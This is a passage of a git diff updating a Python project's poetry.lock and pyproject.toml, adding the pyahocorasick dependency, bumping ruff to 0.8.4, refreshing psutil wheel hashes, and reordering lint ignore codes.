= "sha256:ca9609c77ea3b8481ab005da74ed894035936223422dc591d6772b147421f777"}, + {file = "psutil-6.1.1-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:8df0178ba8a9e5bc84fed9cfa61d54601b371fbec5c8eebad27575f1e105c0d4"}, + {file = "psutil-6.1.1-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:1924e659d6c19c647e763e78670a05dbb7feaf44a0e9c94bf9e14dfc6ba50468"}, + {file = "psutil-6.1.1-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:018aeae2af92d943fdf1da6b58665124897cfc94faa2ca92098838f83e1b1bca"}, + {file = "psutil-6.1.1-cp27-none-win32.whl", hash = "sha256:6d4281f5bbca041e2292be3380ec56a9413b790579b8e593b1784499d0005dac"}, + {file = "psutil-6.1.1-cp27-none-win_amd64.whl", hash = "sha256:c777eb75bb33c47377c9af68f30e9f11bc78e0f07fbf907be4a5d70b2fe5f030"}, + {file = "psutil-6.1.1-cp36-abi3-macosx_10_9_x86_64.whl", hash = "sha256:fc0ed7fe2231a444fc219b9c42d0376e0a9a1a72f16c5cfa0f68d19f1a0663e8"}, + {file = "psutil-6.1.1-cp36-abi3-macosx_11_0_arm64.whl", hash = "sha256:0bdd4eab935276290ad3cb718e9809412895ca6b5b334f5a9111ee6d9aff9377"}, + {file = "psutil-6.1.1-cp36-abi3-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b6e06c20c05fe95a3d7302d74e7097756d4ba1247975ad6905441ae1b5b66003"}, + {file = "psutil-6.1.1-cp36-abi3-manylinux_2_12_x86_64.manylinux2010_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:97f7cb9921fbec4904f522d972f0c0e1f4fabbdd4e0287813b21215074a0f160"}, + {file = "psutil-6.1.1-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:33431e84fee02bc84ea36d9e2c4a6d395d479c9dd9bba2376c1f6ee8f3a4e0b3"}, + {file = "psutil-6.1.1-cp36-cp36m-win32.whl", hash = "sha256:384636b1a64b47814437d1173be1427a7c83681b17a450bfc309a1953e329603"}, + {file = "psutil-6.1.1-cp36-cp36m-win_amd64.whl", hash = "sha256:8be07491f6ebe1a693f17d4f11e69d0dc1811fa082736500f649f79df7735303"}, + {file = "psutil-6.1.1-cp37-abi3-win32.whl", hash = "sha256:eaa912e0b11848c4d9279a93d7e2783df352b082f40111e078388701fd479e53"}, + {file = "psutil-6.1.1-cp37-abi3-win_amd64.whl", hash = "sha256:f35cfccb065fff93529d2afb4a2e89e363fe63ca1e4a5da22b603a85833c2649"}, + {file = "psutil-6.1.1.tar.gz", hash = "sha256:cf8496728c18f2d0b45198f06895be52f36611711746b7f30c464b422b50e2f5"}, ] [package.extras] -dev = ["black", "check-manifest", "coverage", "packaging", "pylint", "pyperf", "pypinfo", "pytest-cov", "requests", "rstcheck", "ruff", "sphinx", "sphinx_rtd_theme", "toml-sort", "twine", "virtualenv", "wheel"] +dev = ["abi3audit", "black", "check-manifest", "coverage", "packaging", "pylint", "pyperf", "pypinfo", "pytest-cov", "requests", "rstcheck", "ruff", "sphinx", "sphinx_rtd_theme", "toml-sort", "twine", "virtualenv", "vulture", "wheel"] test = ["pytest", "pytest-xdist", "setuptools"] [[package]] @@ -1704,6 +1704,44 @@ files = [ {file = "puremagic-1.28.tar.gz", hash = "sha256:195893fc129657f611b86b959aab337207d6df7f25372209269ed9e303c1a8c0"}, ] +[[package]] +name = "pyahocorasick" +version = "2.1.0" +description = "pyahocorasick is a fast and memory efficient library for exact or approximate multi-pattern string search. With the ``ahocorasick.Automaton`` class, you can find multiple key string occurrences at once in some input text. You can use it as a plain dict-like Trie or convert a Trie to an automaton for efficient Aho-Corasick search. And pickle to disk for easy reuse of large automatons. Implemented in C and tested on Python 3.6+. Works on Linux, macOS and Windows. BSD-3-Cause license." +optional = false +python-versions = ">=3.8" +files = [ + {file = "pyahocorasick-2.1.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:8c46288044c4f71392efb4f5da0cb8abd160787a8b027afc85079e9c3d7551eb"}, + {file = "pyahocorasick-2.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:1f15529c83b8c6e0548d7d3c5631fefa23fba5190e67be49d6c9e24a6358ff9c"}, + {file = "pyahocorasick-2.1.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:581e3d85043f1797543796f021e8d7d48c18e594529b72d86f70ea78abc88fff"}, + {file = "pyahocorasick-2.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:c860ad9cb59e56c31aed8a5d1ee9d83a0151277b09198d027ffce213697716ed"}, + {file = "pyahocorasick-2.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:4f8eba88fce34a1d8020638a4a8732c6241a5d85fe12be8669b7495d99d36b6a"}, + {file = "pyahocorasick-2.1.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:d6e0da0a8fc78c694778dced537c1bfb8b2f178ec92a82d81539d2e35a15cba0"}, + {file = "pyahocorasick-2.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:658d55e51c7588a5dba57de674241a16a3c94bf57f3bfd70022c4d7defe2b0f4"}, + {file = "pyahocorasick-2.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a9f2728ac77bab807ba65c6ef41be30358ef0c9bb6960c9fe070d43f7024cb91"}, + {file = "pyahocorasick-2.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:a58c44c407a45155dc7a3253274b5fd78ab00b579bd5685059610867cdb37142"}, + {file = "pyahocorasick-2.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:d8254d6333df5eb400ed3ec8b24da9e3f5da8e28b94a71392391703a7aac568d"}, + {file = "pyahocorasick-2.1.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:82b0d20e82cc282fd29324e8df93809cebbffb345055214ce4b7873698df02c8"}, + {file = "pyahocorasick-2.1.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:6dedb9fed92705b742d6aa3d87abb1ec999f57310ef32b962f65f4e42182fe0a"}, + {file = "pyahocorasick-2.1.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f209796e7d354734781dd883c333596e482c70136fa76a4cb169f383e6c40bca"}, + {file = "pyahocorasick-2.1.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8337af64c649223cff548c7204dda823e83622d63e5449bc51ae069efb2f240f"}, + {file = "pyahocorasick-2.1.0-cp312-cp312-win_amd64.whl", hash = "sha256:5ebe0d1e15afb782477e3d0aa1dce28ab9dad1200211fb785b9c1cc1208e6f04"}, + {file = "pyahocorasick-2.1.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:7454ba5fa528958ca9a1bc3143f8e980bd7817ea481f46495e6ffa89675ab93b"}, + {file = "pyahocorasick-2.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3795ac922d21fbfea40a6b3a330762e8b38ce8ba511b1eb15bf9eeb9303b2662"}, + {file = "pyahocorasick-2.1.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:8e92150849a3c13da37e37ca6374fa55960fd5c845029eca02d9b5846b26fe48"}, + {file = "pyahocorasick-2.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:23b183600e2087f16f6c5e6185d61525ad74335f2a5b693dd6d66bba2f6a4b05"}, + {file = "pyahocorasick-2.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:7034b26e145518610651339b8701568a3533a3114b00cf55f22bca80bff58e6d"}, + {file = "pyahocorasick-2.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:36491675a13fe4181a6b3bccfc9032a1a5d03bd3b0a151c06f8865c16ba44b42"}, + {file = "pyahocorasick-2.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:895ab1ff5384ee5325c74cbacafc419e534f1f110b9fb3c544cc56832ecce082"}, + {file = "pyahocorasick-2.1.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:bf4a4b19ac37e9a7087646b8bcc306acd7a91649355d59b866b756068e35d018"}, + {file = "pyahocorasick-2.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:f44f96496aa773fc5bf302ddf968dd6b920fab34522f944392af8bde13cbe805"}, + {file = "pyahocorasick-2.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:05b7c2ef52da247efec6fb5a011113b7e943e961e22aaaf757cb9c15083440c9"}, + {file = "pyahocorasick-2.1.0.tar.gz", hash = "sha256:4df4845c1149e9fa4aa33f0f0aa35f5a42957a43a3d6e447c9b44e679e2672ea"}, +] + +[package.extras] +testing = ["pytest", "setuptools", "twine", "wheel"] + [[package]] name = "pycparser" version = "2.22" @@ -2488,29 +2526,29 @@ test = ["commentjson", "packaging", "pytest"] [[package]] name = "ruff" -version = "0.8.3" +version = "0.8.4" description = "An extremely fast Python linter and code formatter, written in Rust." optional = false python-versions = ">=3.7" files = [ - {file = "ruff-0.8.3-py3-none-linux_armv6l.whl", hash = "sha256:8d5d273ffffff0acd3db5bf626d4b131aa5a5ada1276126231c4174543ce20d6"}, - {file = "ruff-0.8.3-py3-none-macosx_10_12_x86_64.whl", hash = "sha256:e4d66a21de39f15c9757d00c50c8cdd20ac84f55684ca56def7891a025d7e939"}, - {file = "ruff-0.8.3-py3-none-macosx_11_0_arm64.whl", hash = "sha256:c356e770811858bd20832af696ff6c7e884701115094f427b64b25093d6d932d"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9c0a60a825e3e177116c84009d5ebaa90cf40dfab56e1358d1df4e29a9a14b13"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:75fb782f4db39501210ac093c79c3de581d306624575eddd7e4e13747e61ba18"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7f26bc76a133ecb09a38b7868737eded6941b70a6d34ef53a4027e83913b6502"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_ppc64.manylinux2014_ppc64.whl", hash = "sha256:01b14b2f72a37390c1b13477c1c02d53184f728be2f3ffc3ace5b44e9e87b90d"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:53babd6e63e31f4e96ec95ea0d962298f9f0d9cc5990a1bbb023a6baf2503a82"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1ae441ce4cf925b7f363d33cd6570c51435972d697e3e58928973994e56e1452"}, - {file = "ruff-0.8.3-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d7c65bc0cadce32255e93c57d57ecc2cca23149edd52714c0c5d6fa11ec328cd"}, - {file = "ruff-0.8.3-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:5be450bb18f23f0edc5a4e5585c17a56ba88920d598f04a06bd9fd76d324cb20"}, - {file = "ruff-0.8.3-py3-none-musllinux_1_2_armv7l.whl", hash = "sha256:8faeae3827eaa77f5721f09b9472a18c749139c891dbc17f45e72d8f2ca1f8fc"}, - {file = "ruff-0.8.3-py3-none-musllinux_1_2_i686.whl", hash = "sha256:db503486e1cf074b9808403991663e4277f5c664d3fe237ee0d994d1305bb060"}, - {file = "ruff-0.8.3-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:6567be9fb62fbd7a099209257fef4ad2c3153b60579818b31a23c886ed4147ea"}, - {file = "ruff-0.8.3-py3-none-win32.whl", hash = "sha256:19048f2f878f3ee4583fc6cb23fb636e48c2635e30fb2022b3a1cd293402f964"}, - {file = "ruff-0.8.3-py3-none-win_amd64.whl", hash = "sha256:f7df94f57d7418fa7c3ffb650757e0c2b96cf2501a0b192c18e4fb5571dfada9"}, - {file = "ruff-0.8.3-py3-none-win_arm64.whl", hash = "sha256:fe2756edf68ea79707c8d68b78ca9a58ed9af22e430430491ee03e718b5e4936"}, - {file = "ruff-0.8.3.tar.gz", hash = "sha256:5e7558304353b84279042fc584a4f4cb8a07ae79b2bf3da1a7551d960b5626d3"}, + {file = "ruff-0.8.4-py3-none-linux_armv6l.whl", hash = "sha256:58072f0c06080276804c6a4e21a9045a706584a958e644353603d36ca1eb8a60"}, + {file = "ruff-0.8.4-py3-none-macosx_10_12_x86_64.whl", hash = "sha256:ffb60904651c00a1e0b8df594591770018a0f04587f7deeb3838344fe3adabac"}, + {file = "ruff-0.8.4-py3-none-macosx_11_0_arm64.whl", hash = "sha256:6ddf5d654ac0d44389f6bf05cee4caeefc3132a64b58ea46738111d687352296"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e248b1f0fa2749edd3350a2a342b67b43a2627434c059a063418e3d375cfe643"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:bf197b98ed86e417412ee3b6c893f44c8864f816451441483253d5ff22c0e81e"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c41319b85faa3aadd4d30cb1cffdd9ac6b89704ff79f7664b853785b48eccdf3"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_ppc64.manylinux2014_ppc64.whl", hash = "sha256:9f8402b7c4f96463f135e936d9ab77b65711fcd5d72e5d67597b543bbb43cf3f"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e4e56b3baa9c23d324ead112a4fdf20db9a3f8f29eeabff1355114dd96014604"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:736272574e97157f7edbbb43b1d046125fce9e7d8d583d5d65d0c9bf2c15addf"}, + {file = "ruff-0.8.4-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e5fe710ab6061592521f902fca7ebcb9fabd27bc7c57c764298b1c1f15fff720"}, + {file = "ruff-0.8.4-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:13e9ec6d6b55f6da412d59953d65d66e760d583dd3c1c72bf1f26435b5bfdbae"}, + {file = "ruff-0.8.4-py3-none-musllinux_1_2_armv7l.whl", hash = "sha256:97d9aefef725348ad77d6db98b726cfdb075a40b936c7984088804dfd38268a7"}, + {file = "ruff-0.8.4-py3-none-musllinux_1_2_i686.whl", hash = "sha256:ab78e33325a6f5374e04c2ab924a3367d69a0da36f8c9cb6b894a62017506111"}, + {file = "ruff-0.8.4-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:8ef06f66f4a05c3ddbc9121a8b0cecccd92c5bf3dd43b5472ffe40b8ca10f0f8"}, + {file = "ruff-0.8.4-py3-none-win32.whl", hash = "sha256:552fb6d861320958ca5e15f28b20a3d071aa83b93caee33a87b471f99a6c0835"}, + {file = "ruff-0.8.4-py3-none-win_amd64.whl", hash = "sha256:f21a1143776f8656d7f364bd264a9d60f01b7f52243fbe90e7670c0dfe0cf65d"}, + {file = "ruff-0.8.4-py3-none-win_arm64.whl", hash = "sha256:9183dd615d8df50defa8b1d9a074053891ba39025cf5ae88e8bcb52edcc4bf08"}, + {file = "ruff-0.8.4.tar.gz", hash = "sha256:0d5f89f254836799af1615798caa5f80b7f935d7a670fad66c5007928e57ace8"}, ] [[package]] @@ -3157,4 +3195,4 @@ type = ["pytest-mypy"] [metadata] lock-version = "2.0" python-versions = "^3.9" -content-hash = "0145b8e3c345caf43d941534dbfae68125f0006a29c033857311c392ff73672f" +content-hash = "eb13498c96f67946274d90932ef9a9a4cb6667a7ce5b4dc4f169b356ccc5a216" diff --git a/pyproject.toml b/pyproject.toml index 7b463077d2..444891ec9d 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -53,6 +53,7 @@ setproctitle = "^1.3.3" yara-python = "^4.5.1" pyzmq = "^26.0.3" httpx = "^0.27.0" +pyahocorasick = "^2.1.0" puremagic = "^1.28" radixtarget = "^3.0.13" cloudcheck = "^7.0.12" @@ -103,7 +104,7 @@ skip = "./docs/javascripts/vega*.js,./bbot/wordlists/*" [tool.ruff] line-length = 119 format.exclude = ["bbot/test/test_step_1/test_manager_*"] -lint.ignore = ["E402", "E711", "E713", "E721", "E741", "F401", "F403", "F405"] +lint.ignore = ["E402", "E721", "E741", "F401", "F403", "F405", "E713", "E711"] [tool.poetry-dynamic-versioning] enable = true